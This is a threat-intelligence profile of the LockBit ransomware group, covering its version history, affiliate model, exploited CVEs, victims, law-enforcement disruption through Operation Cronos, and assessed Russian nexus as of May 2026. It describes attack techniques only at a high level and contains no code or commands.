Executive Summary and Group Overview
LockBit is the most prolific ransomware-as-a-service (RaaS) ecosystem on record. First appearing in late 2019 as "ABCD ransomware," it evolved through six major code branches and maintained global dominance from 2021 through 2023, peaking at roughly 44% of all identified ransomware incidents and generating more than $120 million in confirmed ransom receipts. The U.S. Department of Justice attributed more than 2,000 confirmed victims across all critical infrastructure sectors and all major geographic regions except the CIS. A 10-country law enforcement coalition (Operation Cronos, February 2024) achieved an unprecedented disruption, seizing 34+ servers, 200+ cryptocurrency wallets, and more than 7,000 decryption keys. Despite this, LockBit rebuilt, releasing versions 4.0 (February 2025) and 5.0 (September 2025). A second blow arrived in May 2025 when an unknown actor hacked and defaced the LockBit admin panel, leaking an affiliate database covering December 2024 through April 2025. As of May 2026, LockBit remains a functioning RaaS with continuing technical development but a materially degraded brand, reduced affiliate confidence, and a market share well below its 2022 peak.
| Attribute | Detail |
|---|---|
| CrowdStrike designation | BITWISE SPIDER (developer of LockBit ransomware and StealBit exfiltration tool; not a parent-organization designator) |
| Secureworks designation | GOLD MYSTIC (operator of the LockBit RaaS scheme since mid-2019) |
| Trend Micro designation | Water Selkie |
| Mandiant / Google designation | No formal APT/FIN designation for the LockBit core; Mandiant tracks Evil Corp affiliates using LockBit as UNC2165 (a distinct cluster, not the LockBit operator group) |
| CISA / IC3 designation | "LockBit" and "LockBit 3.0" in StopRansomware advisories; no specific threat-cluster name |
| Lineage | Independent origin; no Conti parent-child relationship. LockBit Green (2023) incorporates leaked Conti source code but was developed as a variant, not a succession |
| Operational model | RaaS; 80/20 revenue split (80% affiliate, 20% operator) per Chainalysis and TRM Labs on-chain analysis |
| Extortion mechanic | Double extortion (encryption + data publication) from v2.0; triple extortion (adding DDoS/harassment) from v3.0 |
| Assessed jurisdiction | Russia (CONFIRMED: CIS avoidance code, Russian-language forums, identified operator Khoroshev from Voronezh, no domestic prosecution) |
| LE disruption status | Operation Cronos (Feb 2024) and anonymous admin panel breach (May 2025); operative but degraded as of May 2026 |
Lineage and Organizational Heritage
| Version | Also Known As | Period | Key Developments |
|---|---|---|---|
| LockBit 1.0 (ABCD) | ABCD Ransomware | Late 2019 – mid-2021 | Initial Windows encryptor; ".abcd" extension in earliest form; rebranded to "LockBit" Jan 2020; Linux/ESXi variant added Oct 2021 |
| LockBit 2.0 | LockBit Red | June 2021 – early 2022 | Mature RaaS model; integrated StealBit data-exfiltration tool; double extortion formalized; automated domain controller discovery; advertised as world's fastest encryptor |
| LockBit 3.0 | LockBit Black | March 2022 – 2024 | Major refactor; modular architecture; anti-analysis protections; code similarities with BlackMatter and ALPHV/BlackCat; triple extortion (DDoS/harassment); bug-bounty program; selective encryption |
| LockBit Green | — | Jan 2023+ | Hybrid variant incorporating leaked Conti source code (BCryptGenRandom for faster encryption); observed by vx-underground; distinct code branch, not a successor to 3.0 |
| LockBit 4.0 | — | Announced Dec 2024; released Feb 2025 | Post-Cronos rebuild; enhanced evasion; re-architected affiliate portal with new onion domains and access keys; announced from existing LockBit 3.0 site per Deep Instinct |
| LockBit 5.0 | — | Announced and released Sep 2025 | Sixth-anniversary release; Windows/Linux/ESXi variants confirmed by Trend Micro; randomized 16-character file extensions; faster encryption; removal of infection markers; better affiliate UI; enhanced obfuscation and anti-analysis |
The following pillars address the contested question of whether post-Cronos LockBit (4.0/5.0) represents the same operator cluster or a partial splinter. Code continuity is not contested; human continuity is the open question.
LockBit 3.0 / Black shares documented technical similarities with BlackMatter and ALPHV/BlackCat in configuration structures and specific routines. Multiple vendors confirm these similarities but the interpretation remains contested: some assess code borrowing or licensing, others assess convergent design by developers familiar with the same code base. There is no confirmed evidence of a unified actor behind all three families. Confidence: CREDIBLE for the technical similarity; ANALYST INFERENCE for any shared authorship or collaboration.
Operational Model
LockBit operates a pure RaaS model. A core developer team maintains encryptors, infrastructure, and affiliate portals while independent affiliates supply initial access, deploy the malware, and manage victim negotiations. Revenue is split 80% to affiliates and 20% to the LockBit operator tier, per Chainalysis on-chain analysis confirmed by TRM Labs. DOJ reporting confirmed that 114 affiliates paid to join the LockBit program as of February 2024. The operator tier collects fees passively; affiliate wallets receive victim payments first, with the operator share extracted via the built-in split mechanism.
LockBit has recruited on Russian-language underground forums, emphasizing speed, automation, and affiliate-friendly terms. Vetting is described in open sources as moderate, with preference for affiliates who can demonstrate prior access capabilities and ability to deliver large enterprise victims. Some leak data suggests blacklisting of unreliable partners. Confidence: CREDIBLE (single-source / limited open corroboration on vetting specifics).
The bug-bounty program launched with LockBit 3.0 offered financial rewards for identification of vulnerabilities in the ransomware and its infrastructure, reflecting an unusual professionalization effort and likely an attempt to address leaks and security failures.
- Initial demands: Hundreds of thousands to multiple millions USD; IBM reported an average payment of approximately $1.5 million for LockBit 3.0 in 2022
- Time-limited discounts: Affiliates commonly offer 20-50% reductions if paid within days of initial demand
- Escalation ladder: Countdown timers, data sampling, threat to contact customers or regulators, DDoS attacks (3.0+), and full publication
- Multi-extortion from 3.0: Triple extortion adds DDoS or targeted harassment of victims alongside encryption and data publication threats
- Communication channel: TOR-hosted chat portal linked from ransom note via unique victim ID; some affiliates also used email and secure messaging
| Version | Encryption | Data Leak Threat | DDoS/Harassment | Notes |
|---|---|---|---|---|
| LockBit 1.0 | Yes | Limited | No | Early variant; single extortion primary |
| LockBit 2.0 | Yes | Yes (StealBit) | No | Double extortion systematized; StealBit introduced |
| LockBit 3.0 / Black | Yes | Yes | Yes | Triple extortion; bug bounty; DDoS add-on service |
| LockBit Green | Yes | Yes | Yes | Conti-derived; cloud service targeting |
| LockBit 4.0 | Yes | Yes | Yes | Post-Cronos rebuild; quiet-mode operation added |
| LockBit 5.0 | Yes | Yes | Yes | Refreshed affiliate incentive model; enhanced evasion |
Technical Capabilities
| CVE | Affected Product | Type | Confidence | Source |
|---|---|---|---|---|
| CVE-2023-4966 | Citrix NetScaler ADC / NetScaler Gateway | Session hijack / MFA bypass ("Citrix Bleed") | Confirmed | CISA AA23-325A; joint advisory FBI, MS-ISAC, ASD's ACSC |
| CVE-2021-44228 | Apache Log4j2 | Remote code execution (Log4Shell) | Confirmed | CISA advisory AA23-165A |
| CVE-2020-1472 | Microsoft Netlogon | Privilege escalation (Zerologon) | Confirmed | CISA advisory AA23-165A |
| CVE-2018-13379 | Fortinet FortiOS SSL VPN | Path traversal / credential access | Confirmed | CISA advisory AA23-165A |
| CVE-2021-34473 / 34523 / 31207 | Microsoft Exchange Server | Remote code execution (ProxyShell chain) | Credible | CISA advisory; multiple TI vendor reports |
| CVE-2021-36942 | Windows LSA | Forced authentication spoofing | Credible | Qualys Threat Research Unit; CISA advisory |
| CVE-2023-27350 / 27351 | PaperCut MF/NG | Unauthenticated RCE / information disclosure | Credible | Multiple vendor reports; CISA KEV |
| CVE-2019-0708 | Windows Remote Desktop Services | Remote code execution (BlueKeep) | Credible | Qualys Threat Research Unit |
Note: LockBit is a RaaS, so CVE exploitation reflects affiliate tradecraft, not a single actor. Not all CVEs above are used in every LockBit campaign. Attribution of a specific CVE to "LockBit" means it has been documented in campaigns by LockBit affiliates.
- Compromised credentials / RDP exploitation: Brute-forcing or purchasing credentials for RDP and VPN; the most consistent vector across all affiliate-tier operators
- Vulnerability exploitation: Edge device and appliance CVEs (see table above); Citrix Bleed (CVE-2023-4966) associated with multiple high-profile 2023 victims including Boeing and ICBC
- Phishing: Email-borne malware or credential-harvesting campaigns; used by certain affiliates as a preferred entry method
- MSP and supply-chain compromise: Documented cases of abusing trusted remote management tools operated by managed service providers
- Domain admin credential leverage to push payloads via PsExec, SMB shares, and Group Policy Objects
- Disabling security tools and services via PowerShell, Group Policy, and registry edits prior to deployment
- Living-off-the-land (LOTL) techniques using built-in Windows tools
- Automated network share and domain controller discovery (introduced with v2.0); accelerates spread across Windows domains
- StealBit exfiltration tool (v2.0+): custom-built tool for high-speed data theft prior to encryption; all StealBit servers seized in Operation Cronos
- rclone used as supplementary exfiltration mechanism for cloud storage staging
All LockBit versions use a hybrid encryption scheme: symmetric encryption (typically AES) for file content combined with asymmetric encryption (RSA or ECC) for key protection. Per-file or per-session keys are managed via embedded public keys, with private keys held by the operator tier.
- v1.0 / v2.0: Multi-threaded encryption for speed; v2.0 marketed as the fastest available at release; Volume Shadow Copy deletion
- v3.0 / Black: Selective encryption (partial file encryption to prioritize critical data while maximizing speed); packed binaries; control-flow obfuscation; anti-debugging checks
- Green variant: BCryptGenRandom for faster key generation, derived from Conti source code
- v5.0: Randomized 16-character file extensions; further removal of infection markers; enhanced cross-platform obfuscation per Trend Micro analysis
| Platform | First Version | Current Status | Notes |
|---|---|---|---|
| Windows | v1.0 (2019) | Full support, all versions | Core target; extensive domain automation |
| Linux / VMware ESXi | v1.0 (Oct 2021) | Full support, v3.0 through v5.0 | Targets virtual disk files; shuts down VMs before encryption |
| macOS | Observed Apr 2023 | Limited / experimental | Samples found on VirusTotal; operational use not confirmed at scale |
Financial Infrastructure
LockBit predominantly uses Bitcoin for ransom payments, with Monero available in some affiliate arrangements for added privacy. Victim payments go to affiliate-controlled wallets specified in negotiation chats, with the 20% operator share extracted through the built-in affiliate panel mechanism. TRM Labs confirmed this 80/20 split via on-chain analysis of payment flow clusters. DOJ attributed more than $120 million in confirmed ransom receipts through February 2024; TRM Labs documented at least $44 million in 2022 alone.
OFAC designated Dmitry Yuryevich Khoroshev ("LockBitSupp") and associated wallets on May 7, 2024, in coordination with the UK National Crime Agency and Australian Federal Police. Additional wallet clusters linked to LockBit affiliates have been designated over time. Analysts should expect ongoing OFAC designations as new wallets are linked via blockchain forensics; however, many affiliate-level wallets will remain undesignated and overlap with unrelated criminal activity.
Victim Profile and Targeting
LockBit's growth trajectory from market entrant to dominant player spans four years:
- LockBit 1.0 (2020): Approximately 5% of global ransomware attacks in its first operational year (IBM)
- LockBit 2.0 (2021): Rose to approximately 10% of global ransomware attacks
- LockBit 3.0 (2022): Exceeded 20% of global attacks; Akamai research recorded 39% of total ransomware victims in one measured period, triple the next-highest group
- 2023: NCC Group recorded more than 1,000 LockBit victims, equaling 22% of all identified ransomware victims that year; separately assessed at up to 44% of all global ransomware incidents at peak
- Post-Cronos (2024-2026): Market share declined; LockBit remained the top actor by victim count in May 2024 (10% of attacks per Infosecurity Magazine) but at substantially reduced absolute and relative volume
| Dimension | Detail | Confidence |
|---|---|---|
| Primary sectors | Manufacturing, healthcare, government/public sector, education, financial services, energy, professional services, transportation | CONFIRMED (CISA advisory AA23-165A; DOJ) |
| Target size | SMBs, mid-market, and large enterprises; focus on organizations with sufficient revenue to pay meaningful ransoms; high-profile cases skew to large enterprises and critical infrastructure | CONFIRMED |
| Geography | North America (US primary), Europe, Asia-Pacific, Latin America; CIS countries excluded (code-level and observed victim geography) | CONFIRMED |
| CIS exclusion | Russia, Belarus, and most CIS nations are excluded by both technical locale checks and observed victim lists | CONFIRMED |
| Stated targeting rules | LockBit publicly claims to avoid some hospitals and charities; empirical data shows numerous healthcare and public-sector victims, indicating rules are inconsistently enforced by affiliates | CONFIRMED (inconsistency) |
| Victim | Sector | Date | Notes |
|---|---|---|---|
| Royal Mail (UK) | Postal / logistics | Jan 2023 | Major national disruption; LockBit 3.0 affiliate; Royal Mail refused to pay; data published |
| TSMC (via supplier) | Semiconductor | Jun 2023 | LockBit claimed breach via third-party supplier; TSMC confirmed supplier incident; $70M demand |
| Boeing | Aerospace / defense | Nov 2023 | CVE-2023-4966 (Citrix Bleed) exploitation confirmed; Boeing Distribution Inc. unit; data published after non-payment |
| ICBC (Industrial and Commercial Bank of China) | Finance | Nov 2023 | US clearing operations disrupted; LockBit 3.0 affiliate; CVE-2023-4966 vector |
| Allen & Overy | Legal services | Nov 2023 | Major international law firm; data publishing threatened |
| DP World | Logistics / ports | Nov 2023 | Australian ports operator; significant operational disruption |
| Fulton County, Georgia (US) | Government | Jan 2024 | US state court system disrupted for weeks during Trump criminal case proceedings |
| India National Aerospace Laboratories | Aerospace / defense | Nov 2023 | State-owned research organization; LockBit 3.0 |
Law Enforcement and Regulatory Response
| Individual | Alias(es) | Nationality | Action | Status (May 2026) |
|---|---|---|---|---|
| Dmitry Yuryevich Khoroshev | LockBitSupp, LockBit, putinkrab | Russian (Voronezh) | 26-count indictment (NJ grand jury), OFAC sanction, $10M State Dept. reward; identified May 7, 2024 | At large; in Russia; warrant outstanding |
| Artur Sungatov | — | Russian | Indicted for deploying LockBit; unsealed February 20, 2024 | At large |
| Ivan Gennadievich Kondratiev | Bassterlord | Russian | Indicted for deploying LockBit against US and global businesses; unsealed February 20, 2024 | At large |
| Mikhail Vasiliev | — | Russian / Canadian | Charged prior to Cronos; arrested in Canada | Canadian custody; awaiting US extradition |
| Ruslan Magomedovich Astamirov | — | Russian | Charged; arrested | US custody; awaiting trial |
| Mikhail Pavlovich Matveev | Wazawaka | Russian | Indicted; $10M US bounty; believed in Kaliningrad | At large; not apprehended |
| Unnamed developer | — | Unconfirmed | Arrested by Europol August 2024 while traveling outside Russia | In custody |
| Two unnamed members | — | Unconfirmed | Arrested by NCA (one money laundering, one LockBit affiliation) 2024 | In custody |
| Unnamed BPH administrator | — | Unconfirmed | Arrested at Madrid airport by Spanish Guardia Civil 2024 | In custody |
| Two unnamed affiliates | — | Unconfirmed | Arrested in Poland and Ukraine on French judicial request, February 2024 | In custody |
| Date | Action | Agency | Impact |
|---|---|---|---|
| Feb 19-20, 2024 | Operation Cronos Phase 1: Infrastructure seizure | NCA, FBI, Europol, 10-country task force | 34+ servers seized; 11,000+ domains taken down; 200+ crypto wallets frozen; DLS replaced; 7,000+ decryption keys obtained; StealBit servers offline; all LockBit 3.0 affiliate accounts identified; 2 affiliates arrested (Poland, Ukraine) |
| Feb 20, 2024 | DOJ unseals indictments | US DOJ | Artur Sungatov and Ivan Kondratiev (Bassterlord) charged; prior charges against Vasiliev, Astamirov, Matveev confirmed |
| May 7, 2024 | Operation Cronos Phase 2: Leadership identification and sanction | DOJ, OFAC, NCA, Australian Federal Police | Dmitry Khoroshev unmasked as LockBitSupp; 26-count indictment; OFAC sanction; $10M State Dept. reward; additional wallets frozen |
| Aug-Oct 2024 | Additional arrests (four individuals) | Europol, NCA, Spanish Guardia Civil | Developer arrested while traveling; two NCA arrests; BPH admin arrested in Madrid |
| Oct 2024 | Evil Corp sanctions | UK, US, Australia | 15 Evil Corp members sanctioned; some with documented LockBit affiliate overlap |
| May 7, 2025 | Anonymous admin panel breach | Unknown actor | LockBit TOR site defaced: "Don't do crime CRIME IS BAD xoxo from Prague"; MySQL database dumped (paneldb_dump.zip); negotiation chats, wallet addresses, affiliate credentials, and build configs exposed for Dec 2024 to Apr 2025 period |
- Free LockBit 3.0 Black decryptor developed by Japanese Police with Europol support; available at nomoreransom.org
- 7,000+ decryption keys available to victims through lockbitvictims.ic3.gov (FBI IC3 portal)
- Keys are incident-specific; not all keys restore all victims; matching requires contact with FBI or NCA
- No universal decryptor exists for LockBit 4.0 or 5.0 variants as of May 2026
Attribution and State Nexus
- Named operator: Dmitry Yuryevich Khoroshev is a Russian national from Voronezh, Russia; identified by DOJ, OFAC, and NCA via a converging investigation (CONFIRMED)
- CIS avoidance: Code-level locale and keyboard checks exclude Russian/CIS systems; observed victim geography consistently excludes Russia and most CIS countries (CONFIRMED)
- Forum presence: LockBit recruitment and operations advertised on Russian-language cybercrime forums (CONFIRMED)
- No domestic prosecution: No public evidence of Russian authorities charging any LockBit operator despite global impact, consistent with tolerated-cybercrime patterns (CONFIRMED)
- Named affiliates: Multiple charged individuals are Russian nationals; others assessed as Russian-speaking based on operational communications (CONFIRMED for named; CREDIBLE for broader affiliate pool)
Open sources and government advisories do not provide conclusive evidence that LockBit is directed by or operating under the control of FSB, SVR, or GRU. The most defensible assessment is that LockBit is a financially motivated, Russian-language cybercriminal ecosystem operating from jurisdictions that provide practical safe harbor, with de-facto tolerance from Russian authorities in exchange for avoiding domestic targeting.
Three indicators suggest proximity to, but not control by, Russian state interests:
- Colonel Cassad donation: Chainalysis analysis identified a LockBit administrator donating cryptocurrency to "Colonel Cassad," a pro-Russia military journalist in Sevastopol with documented ties to Russian nationalist networks. This is the single most operationally significant indicator of informal state-proximate behavior (CREDIBLE for the transfer; ANALYST INFERENCE for its significance)
- Evil Corp affiliate overlap: Mandiant tracked UNC2165, a cluster of Evil Corp-affiliated operators, as shifting to LockBit to evade US sanctions. Evil Corp itself has documented direct FSB connections per US government indictments. The overlap does not make LockBit an FSB asset, but it places FSB-connected actors within the LockBit affiliate ecosystem (CONFIRMED overlap; ANALYST INFERENCE for implications)
- Data intelligence value: The sectors and organizations targeted by LockBit affiliates include defense contractors, aerospace organizations, government systems, and critical infrastructure that would have intelligence value for the Russian state. Whether any stolen data is shared with Russian intelligence is not documented in open sources (ANALYST INFERENCE)
Trajectory Assessment
LockBit has not undergone a formal rebranding; the core brand has been maintained across all versions. Post-Cronos, versions 4.0 and 5.0 represent version-number escalation as a credibility signal to potential affiliates rather than a substantive identity change. The continued use of the LockBit brand name is operationally significant: it carries recognition that attracts affiliates but also makes the group a persistent high-priority law-enforcement target. The decision to maintain the brand rather than rebrand (as many disrupted groups do) suggests either operator confidence in resilience or recognition that a new brand would not carry the same affiliate recruitment value.
| Connected Group | Relationship Type | Confidence | Notes |
|---|---|---|---|
| Conti (via LockBit Green) | Code acquisition: LockBit Green incorporates leaked Conti source code | CONFIRMED | Not a parent-child relationship; reflects code availability post-2022 Conti leak. Mandiant and others corroborate |
| Evil Corp / UNC2165 | Affiliate overlap: Evil Corp-linked operators used LockBit to evade sanctions | CONFIRMED | Mandiant tracked UNC2165 as Evil Corp cluster shifting to LockBit 3.0; Evil Corp has documented FSB connections per US DOJ indictments |
| BlackMatter / ALPHV-BlackCat | Code similarities: shared configuration structures and routines with LockBit 3.0 / Black | CREDIBLE | Multiple vendors confirm technical overlap; interpretation (code borrowing vs. shared authorship) remains contested; no confirmed unified actor |
| Qilin / DragonForce | Possible affiliate overlap and infrastructure sharing post-Cronos | LOW CONFIDENCE | Limited open-source evidence; primarily forum-based and infrastructure overlap observations. Mandiant and Recorded Future have not published formal assessments as of May 2026 |
- Continued development: LockBit 5.0 (September 2025) demonstrates ongoing technical investment and operator capability; cross-platform support and anti-analysis improvements indicate the developer tier remains active
- Revenue contraction: $2.3M total in five post-Cronos months (Dec 2024 to Apr 2025) versus $44M in 2022 alone represents an approximate 80-90% revenue decline from peak; this is the sharpest measurable indicator of ecosystem degradation
- Market share erosion: Competitor RaaS operations (Akira, Qilin, DragonForce, others) have gained affiliates following Cronos; LockBit no longer dominates the ransomware landscape as it did in 2022-2023
- Brand risk: Two major public compromises in fourteen months create structural affiliate confidence problems; the May 2025 breach exposed not just infrastructure but the security of the affiliate relationship itself
- Cumulative law enforcement pressure: No other ransomware group has faced simultaneous infrastructure seizure, leadership identification/sanction, decryptor release, and a secondary anonymous breach within a 15-month period; the combined effect on LockBit's ability to recruit credible affiliates is assessed as significant
Recent Reporting LIVE
Open-source reporting from monitored threat intelligence sources. Refreshed automatically every 8 hours via ransomware.live and major TI blog feeds. Authored analysis above is unaffected by this feed.